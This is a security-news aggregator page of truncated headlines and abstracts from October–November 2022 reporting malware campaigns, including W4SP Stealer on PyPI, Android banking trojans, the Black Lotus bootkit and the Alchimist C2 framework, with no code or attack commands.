W4SP Stealer Constantly Targeting Python Developers in Ongoing Supply Chain Attack Full Text
Abstract
An ongoing supply chain attack has been leveraging malicious Python packages to distribute malware called W4SP Stealer, with over hundreds of victims ensnared to date. "The threat actor is still active and is releasing more malicious packages," Checkmarx researcher Jossef Harush said in a technical write-up, calling the adversary WASP . "The attack seems related to cybercrime as the attacker claims that these tools are undetectable to increase sales." The findings from Checkmarx build on recent reports from Phylum and Check Point , which flagged 30 different modules published on the Python Package Index (PyPI) that were designed to propagate malicious code under the guise of benign-looking packages. The attack is just the latest threat to target the software supply chain. What makes it notable is the use of steganography to extract a polymorphic malware payload hidden within an image file hosted on Imgur. The installation of the package ultimately makThe Hacker News
November 17, 2022
WASP Malware Uses Steganography and Polymorphism to Evade Detection Full Text
Abstract
PyPI, an open-source repository used by developers to share Python packages used in projects, is an increasingly popular target in software supply chain attacks for uploading malicious code via fake packages.The Register
November 15, 2022
Typhon Reborn: Stealer Comes Back with New Capabilities Full Text
Abstract
Crypto miner/stealer for hire, Typhon Stealer, received a new update in the form of Typhon Reborn, disclosed Palo Alto Networks. The new variant boasts enhanced anti-analysis techniques and other stealing and file-grabber features. Researchers found that it leverages Telegram’s API and infrastructu ... Read MoreCyware Alerts - Hacker News
November 15, 2022
Dtrack Malware Operations Expanded to Europe and Latin America Full Text
Abstract
DTrack is a backdoor used by the Lazarus group. Initially discovered in 2019, the backdoor remains in use three years later. It is used by the Lazarus group against a wide variety of targets.Securelist
November 14, 2022
Malicious Google Play Store App Distributes Xenomorph Banking Trojan Full Text
Abstract
The Zscaler ThreatLabz team stumbled across the Xenomorph banking trojan loaded over a lifestyle app called ‘Todo: Day manager,’ in the Google Play store. The malware is dropped via GitHub as a fake Google Service application right during the installation of the app. It opens as an overlay onto leg ... Read MoreCyware Alerts - Hacker News
November 12, 2022
Malicious app in the Play Store spotted distributing Xenomorph Banking Trojan Full Text
Abstract
Experts discovered two new malicious dropper apps on the Google Play Store distributing the Xenomorph banking malware. Zscaler ThreatLabz researchers discovered a couple of malicious dropper apps on the Play Store distributing the Xenomorph banking...Security Affairs
November 11, 2022
Malicious Google Play Store App Spotted Distributing Xenomorph Banking Trojan Full Text
Abstract
Google has removed two new malicious dropper apps that have been detected on the Play Store for Android, one of which posed as a lifestyle app and was caught distributing the Xenomorph banking malware. "Xenomorph is a trojan that steals credentials from banking applications on users' devices," Zscaler ThreatLabz researchers Himanshu Sharma and Viral Gandhi said in an analysis published Thursday. "It is also capable of intercepting users' SMS messages and notifications, enabling it to steal one-time passwords and multi-factor authentication requests." The cybersecurity firm said it also found an expense tracker app that exhibited similar behavior, but noted that it couldn't extract the URL used to fetch the malware artifact. The two malicious apps are as follows - Todo: Day manager (com.todo.daymanager) 経費キーパー (com.setprice.expenses) Both the apps function as a dropper, meaning the apps themselves are harmless and are a conduit to retrieve tThe Hacker News
November 11, 2022
New BadBazaar Android malware linked to Chinese cyberspies Full Text
Abstract
A previously undocumented Android spyware tool named 'BadBazaar' has been discovered targeting ethnic and religious minorities in China, most notably the Uyghurs in Xinjiang.BleepingComputer
November 10, 2022
Spymax RAT Targets Indian Defense Personnel Full Text
Abstract
Threat actors are using a malicious Android installation package and the Spymax RAT variant to target Indian defense personnel. The RAT imitates the Adobe Reader app. The campaign has been going on for more than a year and researchers have still not been able to attribute it to any threat actor. Th ... Read MoreCyware Alerts - Hacker News
November 10, 2022
Researchers warn of malicious packages on PyPI using steganography Full Text
Abstract
Experts discovered a malicious package on the Python Package Index (PyPI) that uses steganographic to hide malware within image files. CheckPoint researchers discovered a malicious package, named 'apicolor,' on the Python Package Index (PyPI) that...Security Affairs
November 10, 2022
Researchers Uncover PyPI Package Hiding Malicious Code Behind Image File Full Text
Abstract
A malicious package discovered on the Python Package Index (PyPI) has been found employing a steganographic trick to conceal malicious code within image files. The package in question, named " apicolor ," was uploaded to the Python third-party repository on October 31, 2022, and described as a "Core lib for REST API," according to Israeli cybersecurity firm Check Point . It has since been taken down . Apicolor, like other rogue packages detected recently, harbors its malicious behavior in the setup script used to specify metadata associated with the package, such as its dependencies. This takes the form of a second package called "judyb" as well as a seemingly harmless PNG file ("8F4D2uF.png") hosted on Imgur, an image-sharing service. "The judyb code turned out to be a steganography module, responsible [for] hiding and revealing hidden messages inside pictures," Check Point explained. The attack chain entails using the judyThe Hacker News
November 09, 2022
New StrelaStealer malware steals your Outlook, Thunderbird accounts Full Text
Abstract
A new information-stealing malware named 'StrelaStealer' is actively stealing email account credentials from Outlook and Thunderbird, two widely used email clients.BleepingComputer
November 9, 2022
Experts observed Amadey malware deploying LockBit 3.0 Ransomware Full Text
Abstract
Experts noticed that the Amadey malware is being used to deploy LockBit 3.0 ransomware on compromised systems. Researchers from AhnLab Security Emergency Response Center (ASEC) reported that the Amadey malware is being used to deploy LockBit 3.0 ransomware on...Security Affairs
November 09, 2022
New IceXLoader Malware Loader Variant Infected Thousands of Victims Worldwide Full Text
Abstract
An updated version of a malware loader codenamed IceXLoader is suspected of having compromised thousands of personal and enterprise Windows machines across the world. IceXLoader is a commodity malware that's sold for $118 on underground forums for a lifetime license. It's chiefly employed to download and execute additional malware on breached hosts. This past June, Fortinet FortiGuard Labs said it uncovered a version of the trojan written in the Nim programming language with the goal of evading analysis and detection. "While the version discovered in June (v3.0) looked like a work-in-progress, we recently observed a newer v3.3.3 loader which looks to be fully functionable and includes a multi-stage delivery chain," Natalie Zargarov, cybersecurity researcher at Minerva Labs, said in a report published Tuesday. IceXLoader is traditionally distributed through phishing campaigns, with emails containing ZIP archives functioning as a trigger to deploy the malwarThe Hacker News
November 9, 2022
Malicious Chrome Extension Steals Information and Drops Cloud9 Botnet Full Text
Abstract
Zimperium discovered a malicious browser extension, which not only steals the information available during the browser session but can also install malware on a user’s device and subsequently assume control of the entire device.Zimperium
November 08, 2022
Malicious extension lets attackers control Google Chrome remotely Full Text
Abstract
A new Chrome browser botnet named 'Cloud9' has been discovered in the wild using malicious extensions to steal online accounts, log keystrokes, inject ads and malicious JS code, and enlist the victim's browser in DDoS attacks.BleepingComputer
November 08, 2022
New Laplas Clipper Malware Targeting Cryptocurrency Users via SmokeLoader Full Text
Abstract
Cryptocurrency users are being targeted with a new clipper malware strain dubbed Laplas by means of another malware known as SmokeLoader. SmokeLoader, which is delivered by means of weaponized documents sent through spear-phishing emails, further acts as a conduit for other commodity trojans like SystemBC and Raccoon Stealer 2.0 , according to an analysis from Cyble. Observed in the wild since circa 2013, SmokeLoader functions as a generic loader capable of distributing additional payloads onto compromised systems, such as information-stealing malware and other implants. In July 2022, it was found to deploy a backdoor called Amadey . Cyble said it discovered over 180 samples of the Laplas since October 24, 2022, suggesting a wide deployment. Clippers, also called ClipBankers, fall under a category of malware that Microsoft calls cryware , which are designed to steal crypto by keeping close tabs on a victim's clipboard activity and swapping the original wallet adThe Hacker News
November 8, 2022
SmokeLoader campaign distributes new Laplas Clipper malware Full Text
Abstract
Researchers observed a SmokeLoader campaign that is distributing a new clipper malware dubbed Laplas Clipper that targets cryptocurrency users. Cyble researchers uncovered a SmokeLoader campaign that is distributing community malware, such as SystemBC and Raccoon...Security Affairs
November 7, 2022
SocGholish Diversifies and Expands Its Malware Staging Infrastructure to Counter Defenders Full Text
Abstract
Attackers conduct a variety of activities after gaining access through SocGholish, such as system and network reconnaissance, establishing persistence, and deployment of additional tools and malware.Sentinel One
November 7, 2022
Laplas Clipper - A Feature-Rich Clipper With Sophisticated Tactics Full Text
Abstract
Cryptocurrency users worldwide are under attack with the novel Laplas Clipper clipboard stealer, which is being delivered through Smoke Loader and Raccoon Stealer 2.0. Laplas actively monitors the victim’s clipboard activity and replaces the wallet address with a lookalike wallet address during the ... Read MoreCyware Alerts - Hacker News
November 05, 2022
Researchers Uncover 29 Malicious PyPI Packages Targeted Developers with W4SP Stealer Full Text
Abstract
Cybersecurity researchers have uncovered 29 packages in Python Package Index (PyPI), the official third-party software repository for the Python programming language, that aim to infect developers' machines with a malware called W4SP Stealer . "The main attack seems to have started around October 12, 2022, slowly picking up steam to a concentrated effort around October 22," software supply chain security company Phylum said in a report published this week. The list of offending packages is as follows: typesutil, typestring, sutiltype, duonet, fatnoob, strinfer, pydprotect, incrivelsim, twyne, pyptext, installpy, faq, colorwin, requests-httpx, colorsama, shaasigma, stringe, felpesviadinho, cypress, pystyte, pyslyte, pystyle, pyurllib, algorithmic, oiu, iao, curlapi, type-color, and pyhints. Collectively, the packages have been downloaded more than 5,700 times, with some of the libraries (e.g., twyne and colorsama) relying on typosquatting to trick unsuspecting usersThe Hacker News
November 5, 2022
29 malicious PyPI packages spotted delivering the W4SP Stealer Full Text
Abstract
Cybersecurity researchers discovered 29 malicious PyPI packages delivering the W4SP stealer to developers' systems. Cybersecurity researchers have discovered 29 packages in the official Python Package Index (PyPI) repository designed to infect developers'...Security Affairs
November 04, 2022
Researchers Detail New Malware Campaign Targeting Indian Government Employees Full Text
Abstract
The Transparent Tribe threat actor has been linked to a new campaign aimed at Indian government organizations with trojanized versions of a two-factor authentication solution called Kavach . "This group abuses Google advertisements for the purpose of malvertising to distribute backdoored versions of Kavach multi-authentication (MFA) applications," Zscaler ThreatLabz researcher Sudeep Singh said in a Thursday analysis. The cybersecurity company said the advanced persistent threat group has also conducted low-volume credential harvesting attacks in which rogue websites masquerading as official Indian government websites were set up to lure unwitting users into entering their passwords. Transparent Tribe, also known by the monikers APT36, Operation C-Major, and Mythic Leopard, is a suspected Pakistan adversarial collective that has a history of striking Indian and Afghanistan entities. The latest attack chain is not the first time the threat actor has set its sightsThe Hacker News
November 4, 2022
RomCom RAT campaigns abuses popular brands like KeePass and SolarWinds NPM Full Text
Abstract
A new campaign spreading RomCom RAT impersonates popular software brands like KeePass, and SolarWinds. The threat actor behind the RomCom RAT (remote access trojan) has refreshed its attack vector and is now abusing well-known software brands for distribution. Researchers...Security Affairs
November 03, 2022
RomCom RAT malware campaign impersonates KeePass, SolarWinds NPM, Veeam Full Text
Abstract
The threat actor behind the RomCom RAT (remote access trojan) has refreshed its attack vector and is now abusing well-known software brands for distribution.BleepingComputer
November 3, 2022
Drinik Malware Now Targets 18 Indian Banks Full Text
Abstract
Cyble researchers found a new version of the Drinik Android trojan targeting 18 Indian banks while posing as the country’s official tax management app. It attempts to steal victims’ banking credentials and personal information. Since 2016, Drinik has been circulating in India and operating as an SM ... Read MoreCyware Alerts - Hacker News
November 2, 2022
4 Malicious apps on Play Store totaled +1M downloads Full Text
Abstract
Four malicious Android apps uploaded by the same developer to Google Play totaled at least one million downloads. Malwarebytes researchers discovered four malicious apps uploaded by the same developer (Mobile apps Group) to the official Google Play....Security Affairs
November 02, 2022
Dozens of PyPI packages caught dropping ‘W4SP’ info-stealing malware Full Text
Abstract
Researchers have discovered over two dozen Python packages on the PyPI registry that are pushing info-stealing malware.BleepingComputer
November 02, 2022
Inside Raccoon Stealer V2 Full Text
Abstract
Raccoon Stealer is back on the news again. US officials arrested Mark Sokolovsky, one of the malware actors behind this program. In July 2022, after several months of the shutdown, a Raccoon Stealer V2 went viral. Last week, the Department of Justice's press release stated that the malware collected 50 million credentials. This article will give a quick guide to the latest info stealer's version. What is Raccoon infostealer V2? Raccoon Stealer is a kind of malware that steals various data from an infected computer. It's quite a basic malware, but hackers have made Raccoon popular with excellent service and simple navigation. In 2019, Raccoon infostealer was one of the most discussed malware. In exchange for $75 per week and $200 per month, cybercriminals sold this simple but versatile info stealer as a MaaS. The malware was successful in attacking a number of systems. In March 2022, however, threat authors ceased to operate. An updated version of this malware was rThe Hacker News
November 2, 2022
SandStrike, a previously undocumented Android malware targets a Persian-speaking religion minority Full Text
Abstract
Threat actors are using previously undocumented Android spyware, dubbed SandStrike, to spy on a Persian-speaking religion minority. In Q3 2022, Kaspersky researchers uncovered a previously undocumented Android spyware, dubbed SandStrike, employed...Security Affairs
November 02, 2022
Experts Warn of SandStrike Android Spyware Infecting Devices via Malicious VPN App Full Text
Abstract
A previously undocumented Android spyware campaign has been found striking Persian-speaking individuals by masquerading as a seemingly harmless VPN application. Russian cybersecurity firm Kaspersky is tracking the campaign under the moniker SandStrike . It has not been attributed to any particular threat group. "SandStrike is distributed as a means to access resources about the Bahá'í religion that are banned in Iran," the company noted in its APT trends report for the third quarter of 2022. While the app is ostensibly designed to provide victims with a VPN connection to bypass the ban, it's also configured to covertly siphon data from the victims' devices, such as call logs, contacts, and even connect to a remote server to fetch additional commands. The booby-trapped VPN service, while fully functional, is said to be distributed via a Telegram channel controlled by the adversary. Links to the channel are also advertised on fabricated social media accoThe Hacker News
November 01, 2022
Malicious Android apps with 1M+ installs found on Google Play Full Text
Abstract
A set of four malicious applications currently available in Google Play, the official store for the Android system, are directing users sites that steal sensitive information or generate 'pay-per-click' revenue for the operators.BleepingComputer
November 01, 2022
New SandStrike spyware infects Android devices via malicious VPN app Full Text
Abstract
Threat actors are using a newly discovered spyware known as SandStrike and delivered via a malicious VPN application to target Persian-speaking Android users.BleepingComputer
November 01, 2022
Google ad for GIMP.org served info-stealing malware via lookalike site Full Text
Abstract
Searching for 'GIMP' on Google as recently as last week would show visitors an ad for 'GIMP.org,' the official website of the well known graphics editor, GNU Image Manipulation Program. But clicking on it drove visitors to a lookalike phishing website that provided them with a 700 MB executable disguised as GIMP which was malware.BleepingComputer
October 31, 2022
Banking Trojan Techniques: How Financially Motivated Malware Became Infrastructure Full Text
Abstract
While APTs get the most breathless coverage in the news, many threat actors have money on their mind rather than espionage. You can learn a lot about the innovations used by these financially motivated groups by watching banking Trojans.Palo Alto Networks
October 31, 2022
Wannacry, the hybrid malware that brought the world to its knees Full Text
Abstract
Reflecting on the Wannacry ransomware attack, which is the lesson learnt e why most organizations are still ignoring it. In the early afternoon of Friday 12 May 2017, the media broke the news of a global computer security attack carried out through...Security Affairs
October 31, 2022
Malicious dropper apps on Play Store totaled 30.000+ installations Full Text
Abstract
ThreatFabric researchers discovered five malicious dropper apps on Google Play Store with more than 130,000 downloads. Researchers at ThreatFabric have discovered five malicious dropper apps on the official Google Play Store. The malicious dropper...Security Affairs
October 31, 2022
ShadowPad Malware Analysis Highlights C2 Infrastructure and New Associations Full Text
Abstract
Between September 2021 to September 2022, 83 ShadowPad C2 servers (75 unique IPs) were identified on the internet. ShadowPad supports six C2 protocols: TCP, SSL, HTTP, HTTPS, UDP, and DNS.Cyware Alerts - Hacker News
October 30, 2022
New Azov data wiper tries to frame researchers and BleepingComputer Full Text
Abstract
A new and destructive 'Azov Ransomware' data wiper is being heavily distributed through pirated software, key generators, and adware bundles, trying to frame well-known security researchers by claiming they are behind the attack.BleepingComputer
October 29, 2022
Defeating Guloader Anti-Analysis Technique Full Text
Abstract
The Guloader malware uses the control flow obfuscation technique to hide its functionalities and evade detection. This technique impedes both static and dynamic analysis.Palo Alto Networks
October 28, 2022
These Dropper Apps On Play Store Targeting Over 200 Banking and Cryptocurrency Wallets Full Text
Abstract
Five malicious dropper Android apps with over 130,000 cumulative installations have been discovered on the Google Play Store distributing banking trojans like SharkBot and Vultur , which are capable of stealing financial data and performing on-device fraud. "These droppers continue the unstopping evolution of malicious apps sneaking to the official store," Dutch mobile security firm ThreatFabric told The Hacker News in a statement. "This evolution includes following newly introduced policies and masquerading as file managers and overcoming limitations by side-loading the malicious payload through the web browser." Targets of these droppers include 231 banking and cryptocurrency wallet apps from financial institutions in Italy, the U.K., Germany, Spain, Poland, Austria, the U.S., Australia, France, and the Netherlands. Dropper apps on official app stores like Google Play have increasingly become a popular and efficient technique to distribute banking mThe Hacker News
October 28, 2022
Android malware droppers with 130K installs found on Google Play Full Text
Abstract
A set of Android malware droppers were found infiltrating the Google Play store to install malicious programs by pretending to be app updates.BleepingComputer
October 27, 2022
Researchers Expose Over 80 ShadowPad Malware C2 Servers Full Text
Abstract
As many as 85 command-and-control (C2) servers have been discovered supported by the ShadowPad malware since September 2021, with infrastructure detected as recently as October 16, 2022. That's according to VMware's Threat Analysis Unit (TAU), which studied three ShadowPad variants using TCP, UDP, and HTTP(S) protocols for C2 communications. ShadowPad , seen as a successor to PlugX , is a modular malware platform privately shared among multiple Chinese state-sponsored actors since 2015. Taiwanese cybersecurity firm TeamT5, earlier this May, disclosed details of another China-nexus modular implant named Pangolin8RAT , which is believed to be the successor of the PlugX and ShadowPad malware families, linking it to a threat group dubbed Tianwu. An analysis of the three ShadowPad artifacts, which have been previously put to use by Winnti , Tonto Team , and an emerging threat cluster codenamed Space Pirates , made it possible to discover the C2 servers by scanning thThe Hacker News
October 27, 2022
Drinik Android malware now targets users of 18 Indian banks Full Text
Abstract
A new version of the Drinik Android banking trojan targets 18 Indian banks, masquerading as the country's official tax management app to steal victims' personal information and banking credentials.BleepingComputer
October 25, 2022
BlackByte Adds Exbyte Exfiltration Tool to Strengthen Extortion Game Full Text
Abstract
BlackByte ransomware operators have started deploying a new exfiltration tool, named Exbyte, to speed up data theft and upload it to an external server. Exbyte is a Go-based exfiltration tool that uploads stolen files directly to the Mega cloud storage service. With new custom tools, distribut ... Read MoreCyware Alerts - Hacker News
October 25, 2022
Two PoS Malware used to steal data from more than 167,000 credit cards Full Text
Abstract
Researchers reported that threat actors used 2 PoS malware variants to steal information about more than 167,000 credit cards. Cybersecurity firm Group-IB discovered two PoS malware to steal data associated with more than 167,000 credit cards from...Security Affairs
October 25, 2022
Ukrainian charged for operating Raccoon Stealer malware service Full Text
Abstract
26-year-old Ukrainian national Mark Sokolovsky has been charged for his involvement in the Raccoon Stealer malware-as-a-service (MaaS) cybercrime operation.BleepingComputer
October 25, 2022
Dormant Colors campaign operates over 1M malicious Chrome extensions Full Text
Abstract
A new malvertising campaign, code-named Dormant Colors, is delivering malicious Google Chrome extensions that hijack targets’ browsers. Researchers at Guardio Labs have discovered a new malvertising campaign, called Dormant Colors, aimed at delivering...Security Affairs
October 24, 2022
Chrome extensions with 1 million installs hijack targets’ browsers Full Text
Abstract
Researchers at Guardio Labs have discovered a new malvertizing campaign pushing Google Chrome and Microsoft Edge extensions that hijack searches and insert affiliate links into webpages.BleepingComputer
October 24, 2022
Security experts targeted with malicious CVE PoC exploits on GitHub Full Text
Abstract
A team of researchers at the Leiden Institute of Advanced Computer Science discovered thousands of repositories on GitHub that offer fake proof-of-concept (PoC) exploits for multiple vulnerabilities.Security Affairs
October 24, 2022
Malicious Clicker apps in Google Play have 20M+ installs Full Text
Abstract
Researchers discovered 16 malicious clicker apps in the official Google Play store that were downloaded by 20M+ users. Security researchers at McAfee have discovered 16 malicious clicker apps available in the official Google Play store that were installed...Security Affairs
October 24, 2022
Security experts targeted with malicious CVE PoC exploits on GitHub Full Text
Abstract
Researchers discovered thousands of GitHub repositories that offer fake proof-of-concept (PoC) exploits for various flaws used to distribute malware. A team of researchers at the Leiden Institute of Advanced Computer Science (Soufian El Yadmani, Robin...Security Affairs
October 22, 2022
Android adware apps in Google Play downloaded over 20 million times Full Text
Abstract
Security researchers at McAfee have discovered a set of 16 malicious clicker apps that managed to sneak into Google Play, the official app store for Android.BleepingComputer
October 22, 2022
New Clicker Android Malware Infects 20 Million Users Full Text
Abstract
Google Play Store kicked out 16 malicious apps, with a cumulative download of 20 million, that were propagating the Clicker malware for mobile ad fraud. Researchers highlight that the new Android malware is designed to disrupt the mobile advertising ecosystem. It enables its operators to generate r ... Read MoreCyware Alerts - Hacker News
October 21, 2022
ERMAC Banking Trojan Targets Hundreds of Android Users Full Text
Abstract
Cyble detected a mass phishing campaign targeting Android users with the ERMAC banking trojan with the latest version of the trojan targeting 467 apps. The threat actor used typosquatted domains of popular Android application hosting platforms such as Google PlayStore, APKPure, and APKCombo.Cyware Alerts - Hacker News
October 21, 2022
News URSNIF variant doesn’t support banking features Full Text
Abstract
A new variant of the popular Ursnif malware is used as a backdoor to deliver next-stage payloads and steal sensitive data. Mandiant researchers warn of a significant shift from Ursnif's original purpose, the malware initially used in banking frauds...Security Affairs
October 20, 2022
Ursnif malware switches from bank account theft to initial access Full Text
Abstract
A new version of the Ursnif malware (a.k.a. Gozi) emerged as a generic backdoor, stripped of its typical banking trojan functionality.BleepingComputer
October 20, 2022
Experts spotted a new undetectable PowerShell Backdoor posing as a Windows update Full Text
Abstract
Cybersecurity researchers warn of a new PowerShell backdoor that disguises itself as part of the Windows update process to avoid detection. Cybersecurity researchers from SafeBreach a warning of a new PowerShell backdoor masqueraded as a Windows update...Security Affairs
October 20, 2022
Hackers Using New Version of FurBall Android Malware to Spy on Iranian Citizens Full Text
Abstract
The Iranian threat actor known as Domestic Kitten has been attributed to a new mobile campaign that masquerades as a translation app to distribute an updated variant of an Android malware known as FurBall. "Since June 2021, it has been distributed as a translation app via a copycat of an Iranian website that provides translated articles, journals, and books," ESET researcher Lukas Stefanko said in a report shared with The Hacker News. The updates, while retaining the same surveillance functionality as earlier versions, are designed to evade detection by security solutions, the Slovak cybersecurity firm added. Domestic Kitten, also called APT-C-50, is an Iranian threat activity cluster that has been previously identified as targeting individuals of interest with the goal of harvesting sensitive information from compromised mobile devices. It's been known to be active since at least 2016. A tactical analysis conducted by Trend Micro in 2019 revealed Domestic KittenThe Hacker News
October 20, 2022
These 16 Clicker Malware Infected Android Apps Were Downloaded Over 20 Million Times Full Text
Abstract
As many as 16 malicious apps with over 20 million cumulative downloads have been taken down from the Google Play Store after they were caught committing mobile ad fraud. The Clicker malware masqueraded as seemingly harmless utilities like cameras, currency/unit converters, QR code readers, note-taking apps, and dictionaries, among others, in a bid to trick users into downloading them, cybersecurity firm McAfee said . The list of offending apps is as follows - High-Speed Camera (com.hantor.CozyCamera) - 10,000,000+ downloads Smart Task Manager (com.james.SmartTaskManager) - 5,000,000+ downloads Flashlight+ (kr.caramel.flash_plus) - 1,000,000+ downloads 달력메모장 (com.smh.memocalendar) - 1,000,000+ downloads K-Dictionary (com.joysoft.wordBook) - 1,000,000+ downloads BusanBus (com.kmshack.BusanBus) - 1,000,000+ downloads Flashlight+ (com.candlencom.candleprotest) - 500,000+ downloads Quick Note (com.movinapp.quicknote) - 500,000+ downloads Currency Converter (com.smartwho.SmaThe Hacker News
October 20, 2022
New Ursnif Variant Likely Shifting Focus to Ransomware and Data Theft Full Text
Abstract
The Ursnif malware has become the latest malware to shed its roots as a banking trojan to revamp itself into a generic backdoor capable of delivering next-stage payloads, joining the likes of Emotet, Qakbot, and TrickBot. "This is a significant shift from the malware's original purpose to enable banking fraud, but is consistent with the broader threat landscape," Mandiant researchers Sandor Nemes, Sulian Lebegue, and Jessa Valdez disclosed in a Wednesday analysis. The refreshed and refactored variant, first spotted by the Google-owned threat intelligence firm in the wild on June 23, 2022, has been codenamed LDR4, in what's being seen as an attempt to lay the groundwork for potential ransomware and data theft extortion operations. Ursnif, also called Gozi or ISFB, is one of the oldest banker malware families, with the earliest documented attacks going as far back as 2007. Check Point, in August 2020, mapped the " divergent evolution of Gozi " over thThe Hacker News
October 18, 2022
PHP Malware Distributed as Cracked Microsoft Office Apps, Telegram Full Text
Abstract
The Zscaler ThreatLabz research team observed a PHP version of ‘Ducktail’ Infostealer distributed in the form of cracked application installer for a variety of applications including games, Microsoft Office applications, Telegram, and others.GB Hackers
October 18, 2022
Chinese ‘Spyder Loader’ Malware Spotted Targeting Organizations in Hong Kong Full Text
Abstract
The China-aligned espionage-focused actor dubbed Winnti has set its sights on government organizations in Hong Kong as part of an ongoing campaign dubbed Operation CuckooBees . Active since at least 2007, Winnti (aka APT41, Barium, Bronze Atlas, and Wicked Panda) is the name designated to a prolific cyber threat group that carries out Chinese state-sponsored espionage activity, predominantly aimed at stealing intellectual property from organizations in developed economies. The threat actor's campaigns have targeted healthcare, telecoms, high-tech, media, agriculture, and education sectors, with infection chains primarily relying on spear-phishing emails with attachments to initially break into the victims' networks. Earlier this May, Cybereason disclosed long-running attacks orchestrated by the group since 2019 to siphon technology secrets from technology and manufacturing companies mainly located in East Asia, Western Europe, and North America. The intrusions, clubbThe Hacker News
October 17, 2022
Malware dev claims to sell new BlackLotus Windows UEFI bootkit Full Text
Abstract
A threat actor is selling on hacking forums what they claim to be a new UEFI bootkit named BlackLotus, a malicious tool with capabilities usually linked to state-backed threat groups.BleepingComputer
October 17, 2022
New UEFI rootkit Black Lotus offered for sale at $5,000 Full Text
Abstract
Black Lotus is a new, powerful Windows UEFI rootkit advertised on underground criminal forums, researcher warns. Cybersecurity researcher Scott Scheferman reported that a new Windows UEFI rootkit, dubbed Black Lotus, is advertised on underground criminal...Security Affairs
October 17, 2022
Copybara Malware Uses Vishing Tricks to Target Italian Banking Users Full Text
Abstract
Researchers at ThreatFabric uncovered an Android banking malware attack phishing users for their contact details and sensitive banking data. The malware, dubbed Copybara, can extract usernames and passwords for multiple banking accounts. The attack begins with an SMS phishing message purported to a ... Read MoreCyware Alerts - Hacker News
October 17, 2022
New ‘Black Lotus’ UEFI Rootkit Provides APT-Level Capabilities to Cybercriminals Full Text
Abstract
Black Lotus provides a full set of capabilities to attackers, including file transfer and tasking support, and can potentially become a major threat across IT and OT environments.Security Week
October 16, 2022
New PHP information-stealing malware targets Facebook accounts Full Text
Abstract
Threat analysts have spotted a new Ducktail campaign using a new infostealer variant and novel TTPs (tactics, techniques, and procedures), while the Facebook users it targets are no longer limited to holders of business accounts.BleepingComputer
October 15, 2022
New PHP Version of Ducktail info-stealer hijacks Facebook Business accounts Full Text
Abstract
Experts spotted a PHP version of an information-stealing malware called Ducktail spread as cracked installers for legitimate apps and games. Zscaler researchers discovered a PHP version of an information-stealing malware tracked as Ducktail. The malicious...Security Affairs
October 14, 2022
New Alchimist C2 Framework Targets Windows, Linux, macOS Full Text
Abstract
A new attack and C2 framework, dubbed Alchimist, was found capable of targeting Linux, macOS, and Windows systems. It can run arbitrary commands and perform remote shellcode execution. These kinds of frameworks have high quality, rich features, good detection evasion capabilities, and effective imp ... Read MoreCyware Alerts - Hacker News
October 14, 2022
YoWhatsApp - An Unofficial WhatsApp App Steals Credentials Full Text
Abstract
A malicious version of the popular WhatsApp messaging app was found dropping an Android trojan known as Triada. Named YoWhatsApp, the unofficial app offers the ability to lock chats, send texts to unsaved numbers, and customize using different themes. It is spread to users via fraudulent ads on Sna ... Read MoreCyware Alerts - Hacker News
October 14, 2022
New PHP Version of Ducktail Malware Hijacking Facebook Business Accounts Full Text
Abstract
A PHP version of an information-stealing malware called Ducktail has been discovered in the wild being distributed in the form of cracked installers for legitimate apps and games, according to the latest findings from Zscaler. "Like older versions (.NetCore), the latest version (PHP) also aims to exfiltrate sensitive information related to saved browser credentials, Facebook account information, etc.," Zscaler ThreatLabz researchers Tarun Dewan and Stuti Chaturvedi said . Ducktail, which emerged on the threat landscape in late 2021, is attributed to an unnamed Vietnamese threat actor, with the malware primarily designed to hijack Facebook business and advertising accounts. The financially motivated cybercriminal operation was first documented by Finnish cybersecurity company WithSecure (formerly F-Secure) in late July 2022. While previous versions of the malware were found to use Telegram as a command-and-control (C2) channel to exfiltrate information, the PHP varThe Hacker News
October 14, 2022
PoC Exploit Released for Critical Fortinet Auth Bypass Bug Under Active Attacks Full Text
Abstract
A proof-of-concept (PoC) exploit code has been made available for the recently disclosed critical security flaw affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager, making it imperative that users move quickly to apply the patches. "FortiOS exposes a management web portal that allows a user to configure the system," Horizon3.ai researcher James Horseman said . "Additionally, a user can SSH into the system which exposes a locked down CLI interface." The issue, tracked as CVE-2022-40684 (CVSS score: 9.6), concerns an authentication bypass vulnerability that could allow a remote attacker to perform malicious operations on the administrative interface via specially crafted HTTP(S) requests. A successful exploitation of the shortcoming is tantamount to granting complete access "to do just about anything" on the affected system, including altering network configurations, adding malicious users, and intercepting network traffic. That said,The Hacker News
October 13, 2022
Exploit available for critical Fortinet auth bypass bug, patch now Full Text
Abstract
Proof-of-concept exploit code is now available for a critical authentication bypass vulnerability affecting Fortinet's FortiOS, FortiProxy, and FortiSwitchManager appliances.BleepingComputer
October 13, 2022
New Chinese Malware Attack Framework Targets Windows, macOS, and Linux Systems Full Text
Abstract
A previously undocumented command-and-control (C2) framework dubbed Alchimist is likely being used in the wild to target Windows, macOS, and Linux systems. "Alchimist C2 has a web interface written in Simplified Chinese and can generate a configured payload, establish remote sessions, deploy payload to the remote machines, capture screenshots, perform remote shellcode execution, and run arbitrary commands," Cisco Talos said in a report shared with The Hacker News. Written in GoLang, Alchimist is complemented by a beacon implant called Insekt, which comes with remote access features that can be instrumented by the C2 server. The discovery of Alchimist and its assorted family of malware implants comes three months after Talos also detailed another self-contained framework known as Manjusaka , which has been touted as the "Chinese sibling of Sliver and Cobalt Strike." Even more interestingly, both Manjusaka and Alchimist pack in similar functionalities, despThe Hacker News
October 13, 2022
The discovery of Alchimist C2 tool, revealed a new attack framework to target Windows, macOS, and Linux systems Full Text
Abstract
Experts discovered a new attack framework, including a C2 tool dubbed Alchimist, used in attacks against Windows, macOS, and Linux systems. Researchers from Cisco Talos discovered a new, previously undocumented attack framework that included a C2 dubbed...Security Affairs
October 13, 2022
YoWhatsApp, unofficial WhatsApp Android app spreads the Triada Trojan Full Text
Abstract
Kaspersky researchers warn of a recently discovered malicious version of a popular WhatsApp messenger mod dubbed YoWhatsApp. Kaspersky researchers discovered an unofficial WhatsApp Android application named 'YoWhatsApp' that steals access keys...Security Affairs
October 13, 2022
Modified WhatsApp App Caught Infecting Android Devices with Malware Full Text
Abstract
